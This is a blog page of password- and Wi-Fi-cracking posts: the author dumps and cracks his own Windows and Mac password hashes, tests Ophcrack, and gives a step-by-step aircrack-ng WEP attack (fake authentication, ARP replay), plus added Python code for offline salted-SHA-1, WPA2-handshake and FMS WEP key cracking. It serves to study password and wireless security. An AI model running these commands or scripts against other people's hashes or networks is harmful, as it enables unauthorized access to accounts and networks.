Posts tagged cracking
I think the passwords I use are pretty strong: they're long, random, and mix alphanumeric and special characters. I know it's possible to crack passwords, given enough time, so I thought I'd give it a try. I'm curious how long it's going to take to crack. I'll be trying to crack my Windows 7 password and my Mac OS X password using the infamous John the Ripper.
If you want to try this out yourself, you’ll want to use the latest revision (7 at this time) of the Jumbo patch. For the Windows download, you’ll also need to download cygz.dll (there’s a link below the Win32 download) and extract this dll to the /run directory of John the Ripper. For the Mac version, just download the Universal binary.
To extract password hashes from the SAM file on Windows 7, you'll need PwDump7. It's very likely that your virus protection will report it as a virus/trojan of some type (Avira AntiVir reports it as TR/Gendal.77824.CI); you can safely ignore this, but make sure you are indeed downloading it from the author's website, and verify the downloaded exe against the hash provided in PwDump7's ReadMe. You'll need to run PwDump7.exe as an Administrator. I tried fgdump to dump the password hashes first, but it never output anything, even running as Administrator. If PwDump7 doesn't work for you, try fgdump.
Mac OS X 10.6 (Snow Leopard) implements a fairly standard shadowed password file in a non-standard location, with one file per user (named by the user's generated UID under /var/db/shadow/hash/) instead of a single global file like /etc/shadow. Use this script I wrote, pwdumposx, to dump the password hash of the current user.
#!/bin/sh
# pwdumposx - thexploit.com
# Dumps the salted SHA-1 hash of the user who invoked sudo.
# Must run under sudo: the shadow hash files are root-only and $SUDO_USER names the caller.
cmd="/usr/bin/xpath"
path="/var/db/dslocal/nodes/Default/users/"$SUDO_USER".plist"
args="//key1/following::array/string/text()"
# The user's generated UID (36 characters) is the name of the shadow hash file.
guid=$($cmd $path $args 2>/dev/null | cut -c1-36)
# Characters 169-216 of that file are the salted SHA-1 field: 4-byte salt followed by SHA-1, as 48 hex characters.
cat '/var/db/shadow/hash/'$guid | cut -c169-216
Run it like this:
nobody@nobody:~$ chmod +x pwdumposx
nobody@nobody:~$ sudo ./pwdumposx
Once you have the hash, put it in a new file as user:hash and feed that file to JtR. If you want status from JtR while it runs, press <Enter> and it will print its current progress. It might take a really long time.
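To make the 48 hex characters pwdumposx prints concrete, here is an added example (not code from the original post, and not JtR's code) that rebuilds the Mac OS X 10.4-10.6 salted SHA-1 format, the one the Jumbo build cracks as --format=xsha, and runs a small wordlist against it. The password, salt and wordlist are constructed sample values; a hash you dump yourself goes through split_xsha the same way.

```python
"""Offline check of a Mac OS X 10.4-10.6 salted SHA-1 hash (JtR's "xsha" format).

Added example, not code from the original post. The sample password, salt and
wordlist below are constructed so the script runs without a real hash."""
import hashlib


def xsha_hash(password: str, salt: bytes) -> str:
    """Build the 48-hex-char field as stored at offset 168 of /var/db/shadow/hash/<UID>:
    a 4-byte salt followed by SHA-1(salt || password)."""
    if len(salt) != 4:
        raise ValueError("salt must be 4 bytes")
    return (salt + hashlib.sha1(salt + password.encode()).digest()).hex().upper()


def split_xsha(field: str):
    """Return (salt, digest) from the 48-hex-char field pwdumposx prints."""
    field = field.strip()
    if len(field) != 48:
        raise ValueError("expected 48 hex characters (4-byte salt + 20-byte SHA-1)")
    raw = bytes.fromhex(field)
    return raw[:4], raw[4:]


def crack_xsha(field: str, wordlist):
    """Return the first candidate whose salted SHA-1 matches the field, else None.
    This is exactly the work JtR does per candidate: one SHA-1 over salt || word."""
    salt, digest = split_xsha(field)
    for word in wordlist:
        if hashlib.sha1(salt + word.encode()).digest() == digest:
            return word
    return None


def john_line(user: str, field: str) -> str:
    """The user:hash line JtR expects (run it with --format=xsha)."""
    return f"{user}:{field}"


# Constructed sample: a weak password, a fixed salt and a tiny wordlist (not real data).
SAMPLE_SALT = bytes.fromhex("DEADBEEF")
SAMPLE_HASH = xsha_hash("letmein", SAMPLE_SALT)
SAMPLE_WORDS = ["password", "123456", "letmein", "qwerty"]

if __name__ == "__main__":
    print(john_line("nobody", SAMPLE_HASH))
    print("cracked:", crack_xsha(SAMPLE_HASH, SAMPLE_WORDS))
```

Note that the salt is stored in the clear in front of the digest, so it does nothing against a wordlist attack on a single hash; it only stops one precomputed table from covering every user at once.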
Current Cracking Status for my Passwords
The Mac is a Core Duo with 8 gigs RAM
The Windows 7 is an i7 with 12 gigs RAM
- Mac OS X: 3h 26m elapsed, guesses 0
- Microsoft Windows 7: 2h 12m elapsed, guesses 0
- Mac OS X: 14h 31m elapsed, guesses 0
- Microsoft Windows 7: 13h 16m elapsed, guesses 0
Update 3 – FAILED
- Mac OS X: 1d 1h 31m elapsed, guesses 0
- Microsoft Windows 7: 1d 16m elapsed, guesses 0
Unfortunately it’s difficult for me to tie up my computers for more than a day so I’ve stopped both of them near the 1 day mark. The good news is that, as far as brute-forcing goes, my passwords would likely take sufficient time to crack. This just reiterates the fact that non-dictionary random passwords are a must. Maybe if I’m able to get some high powered server resources I’ll rerun this experiment for a week.
I did some simple tests tonight using the "free" rainbow tables that come with Ophcrack. I was expecting at least one of my passwords to be cracked, but neither was. I think there were a couple of reasons for this:
- The password on my XP machine is 15 characters; Ophcrack's free XP tables only go up to 14 characters.
- The password on my Windows 7 machine is not in the dictionary; for Vista and later, Ophcrack's free tables are "based on dictionary" hybrid tables.
The good thing here is that a "trivial" attacker won't be able to get my passwords, since the non-free tables go for $99 apiece, or they'll need to obtain other tables online.
So, is Ophcrack crap? No, probably not; that would be a little harsh, since I bet the free tables would crack a huge majority of the general public's passwords.
Almost everything, in some sense or another, is vulnerable to brute force; it's just a matter of how long the brute force takes, and that is what determines its security. I found it pretty interesting that there are now online WPA crackers that will mount dictionary attacks against captured WPA authentication handshakes:
and even one you pay for that claims to offer 400 CPUs and a 135-million-word dictionary tailored to WPA passwords.
This just goes to show that, in due time, no matter how impossible it seems, dictionary attacks will likely become feasible sooner than one would think; all the more reason to use an entirely random WPA passphrase.
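What those online services actually do with a captured handshake is worth seeing in code. The following is an added example, not code from the original post or from any of the crackers it mentions: it derives the PMK with PBKDF2, expands it to the PTK, and checks the MIC of EAPOL message 2 for each candidate passphrase, which is the complete WPA2 (descriptor version 2, HMAC-SHA1) verification. The SSID, MAC addresses, nonces, EAPOL frame and passphrase are all constructed sample values; with a real capture you would lift the same fields from message 2 of the 4-way handshake.

```python
"""Dictionary attack against a WPA2 4-way handshake, run offline.

Added example, not code from the original post or from any online WPA cracker.
The handshake below is constructed (sample SSID, MACs, nonces, EAPOL frame and
passphrase), so the script runs without a capture."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Those 4096 iterations are the only thing that makes each guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 / key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(hs: dict, wordlist):
    """Return the first passphrase that reproduces the captured MIC, else None."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs["ssid"])
        ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol_zeroed"]), hs["mic"]):
            return word
    return None


# ---- constructed sample handshake (not a real capture) ----
SAMPLE_SSID = "homenet"
SAMPLE_PASSPHRASE = "sunshine1"
SAMPLE_AP = bytes.fromhex("001122334455")
SAMPLE_STA = bytes.fromhex("66778899aabb")
SAMPLE_ANONCE = bytes(range(32))
SAMPLE_SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 (95-byte body) with its 16-byte MIC field already zeroed:
# header, descriptor type 2, key info 0x010a, key length 0, replay counter 1,
# SNonce, then zeroed key IV, RSC, key ID, MIC and key data length.
SAMPLE_EAPOL = (bytes.fromhex("0203005f") + bytes.fromhex("02010a0000")
                + (1).to_bytes(8, "big") + SAMPLE_SNONCE + bytes(16 + 8 + 8 + 16 + 2))


def build_sample() -> dict:
    """What the attacker has after capturing the handshake: everything but the passphrase."""
    pmk = pmk_from_passphrase(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    ptk = ptk_from_pmk(pmk, SAMPLE_AP, SAMPLE_STA, SAMPLE_ANONCE, SAMPLE_SNONCE)
    return {"ssid": SAMPLE_SSID, "ap_mac": SAMPLE_AP, "sta_mac": SAMPLE_STA,
            "anonce": SAMPLE_ANONCE, "snonce": SAMPLE_SNONCE,
            "eapol_zeroed": SAMPLE_EAPOL, "mic": eapol_mic(ptk[:16], SAMPLE_EAPOL)}


SAMPLE_WORDLIST = ["password", "12345678", "sunshine1", "letmein99"]

if __name__ == "__main__":
    print("passphrase:", crack_handshake(build_sample(), SAMPLE_WORDLIST))
```

Everything after the PBKDF2 step is cheap, so the rate of a cracker is set almost entirely by how many PBKDF2-HMAC-SHA1 runs per second it can do; that is what 400 CPUs buy, and why a passphrase that is not in any dictionary is the only real defence. The original WPA (TKIP, descriptor version 1) differs only in using HMAC-MD5 for the MIC.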
Since I’ve been reading a lot about security in networking, I figured I’d give the well known WEP cracking a try.
Common Misconceptions With WEP Cracking
- You need a special card to crack WEP keys.
- This is not true, with some caveats. Any card that can be switched to "monitor mode" can be used to crack WEP keys; the vast majority of cards can do this, or someone has written a custom driver (e.g. for the AirPort Extreme cards in Macs) to enable it. HOWEVER, and this is a big however: if you want to crack WEP without waiting for days or even weeks, you need a card that supports "packet injection." That list is much smaller, but it is growing as the hardcore driver writers write custom drivers for more cards.
- Nobody is going to crack my WEP key
- Not only is this entirely untrue, I personally promise you it will happen. There are now websites hooked into the Google Maps API which map out SSIDs and their encryption level, typically along major roads – http://wigle.net/
Intel 3945abg Wireless Card
This is the card in my Dell Inspiron 640m, and it is a very popular laptop card. Natively this card does not support injection, but around 2007 a package called ipwraw was developed by Tolas Feup, and it has since had 3 versions up to 2008 – http://www.aircrack-ng.org/doku.php?id=ipw3945. I use BackTrack, and as of version 4.0 this card is fully supported with no custom configuration: simply boot BackTrack and start capturing and injecting!
With BackTrack loaded (ensure you're in a graphical environment; if not, type 'startx'), do the following:
Put the Intel card into monitor mode. You should then have a mon0 interface:
airmon-ng start wlan0
Now search for your WEP access point (AP) by scanning for SSIDs with airodump-ng on the monitor interface. This uses a technique called channel hopping, rapidly switching through all wireless channels to capture whatever is being transmitted:
Once you have located your WEP AP, press Ctrl-C to terminate airodump-ng, copy the BSSID of your WEP AP, and make note of its channel. We're now going to start it again, this time capturing only that BSSID on that channel and writing the packets to a file. Leave this terminal open when you're done:
airodump-ng --bssid BSSID -c CHANNEL -w OUTPUT_FILE mon0
Now we need to associate with the AP (a fake authentication, so that the AP will accept frames from our card's MAC address). Open a new terminal and type:
aireplay-ng -1 0 -a BSSID mon0
If the previous command reported "Association successful", you can move on. We're now going to run an ARP replay attack against the AP so that it generates a large volume of packets, each encrypted under a different Initialization Vector (IV). WEP's weakness is that, given enough captured IVs and the known first bytes of each packet, a statistical attack on RC4's key scheduling recovers the key (I plan to discuss the details of WEP weaknesses in a later post).
aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 mon0
Here 00:11:22:33:44:55 stands for the MAC address of your own wireless card, the station you just associated; use its real address, or the AP will drop the replayed frames.
This command may take a minute or so. It captures packets looking for an ARP request; if there is little activity on the AP, finding one can take a while. Once it finds one, you'll see it re-inject that same ARP packet over and over, and the AP answers every copy with a freshly encrypted reply, each carrying a new IV. This really is the key to the speed of the attack; without it we'd have to wait a long time to collect enough IVs for the crack.
Now monitor the airodump-ng terminal. Once the ARP packets are being replayed you should see the count in the #Data column grow at a fast rate. You need to wait until this number is large enough (how large depends on the AP's key size: 64-bit keys need far fewer IVs than 128-bit keys). Try with 50k, then 100k, and so on. Once you've captured enough data, stop aireplay-ng and run aircrack-ng against the capture file airodump-ng wrote (OUTPUT_FILE from above).
If successful you'll get a KEY FOUND! line with the cracked WEP key. Enjoy, have fun, and please don't do anything illegal!
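To show what the cracker does with all those IVs, here is an added example, not code from the original post or from aircrack-ng, that recovers a 40-bit WEP key the FMS way: for each captured packet it knows the IV (sent in the clear), the first plaintext byte (0xAA, the LLC/SNAP header every data frame starts with) and therefore the first RC4 keystream byte; "resolved" IVs then vote for the next key byte. It is the kind of statistical attack aircrack-ng runs in -K mode (the default PTW attack is a refinement that needs far fewer IVs), with a small "fudge factor" search on top, which is the idea behind aircrack-ng's -f option. The capture is simulated: RC4 is implemented inline, the key is a constructed sample, and the packets are generated from it, so nothing needs a radio.

```python
"""FMS-style statistical recovery of a 40-bit WEP key from captured IVs.

Added example, not code from the original post or from aircrack-ng. Everything is
simulated offline: RC4 is implemented here, the "captured" packets are constructed
from a sample key, and no radio is involved."""

N = 256
SNAP_DSAP = 0xAA   # first plaintext byte of every LLC/SNAP frame: known plaintext for free


def rc4_first_byte(key):
    """Run RC4's KSA on key = IV || secret and return the first keystream byte."""
    s = list(range(N))
    j = 0
    for i in range(N):
        j = (j + s[i] + key[i % len(key)]) % N
        s[i], s[j] = s[j], s[i]
    j = s[1]                              # PRGA step 1: i = 1, j = S[1]
    s[1], s[j] = s[j], s[1]
    return s[(s[1] + s[j]) % N]


def capture(secret):
    """Constructed capture: (iv, first ciphertext byte) for the FMS weak IVs
    (A+3, 255, X) of every secret byte A. A real capture mixes these among
    millions of ordinary IVs; ARP replay is what makes the AP emit them quickly."""
    packets = []
    for a in range(len(secret)):
        for x in range(N):
            iv = (a + 3, N - 1, x)
            packets.append((iv, SNAP_DSAP ^ rc4_first_byte(list(iv) + list(secret))))
    return packets


def vote(packets, recovered):
    """Vote for the next secret byte given each IV and the bytes recovered so far."""
    a = len(recovered)
    votes = [0] * N
    for iv, c0 in packets:
        head = list(iv) + list(recovered)          # the a+3 key bytes we know
        s, j = list(range(N)), 0
        for i in range(a + 3):                     # replay the KSA that far
            j = (j + s[i] + head[i]) % N
            s[i], s[j] = s[j], s[i]
        # "Resolved" condition: with probability about e^-3 the first PRGA output
        # is whatever lands in S[a+3] at the next KSA step, which leaks key byte a+3.
        if s[1] >= a + 3 or (s[1] + s[s[1]]) % N != a + 3:
            continue
        z = c0 ^ SNAP_DSAP                         # known plaintext -> keystream byte
        votes[(s.index(z) - j - s[a + 3]) % N] += 1
    return votes


def crack(packets, key_len, fudge=3):
    """Depth-first search over the top `fudge` candidates per byte, verifying each
    full key against the capture (wrong branches are cheap to reject)."""
    def verify(secret):
        return all(SNAP_DSAP ^ rc4_first_byte(list(iv) + secret) == c0
                   for iv, c0 in packets[:8])

    def search(recovered):
        if len(recovered) == key_len:
            return bytes(recovered) if verify(recovered) else None
        votes = vote(packets, recovered)
        for cand in sorted(range(N), key=lambda b: -votes[b])[:fudge]:
            found = search(recovered + [cand])
            if found is not None:
                return found
        return None

    return search([])


SAMPLE_KEY = bytes.fromhex("1f2a3b4c5d")   # constructed 40-bit ("64-bit") WEP key

if __name__ == "__main__":
    pkts = capture(SAMPLE_KEY)
    print("KEY FOUND!", crack(pkts, len(SAMPLE_KEY)).hex().upper())
```

The point to take from it: the key is never brute-forced; each resolved IV gives a roughly 5% chance of a correct vote, so the attack only needs enough packets for the true byte to win the vote, and the ARP replay step exists purely to collect those packets in minutes instead of days.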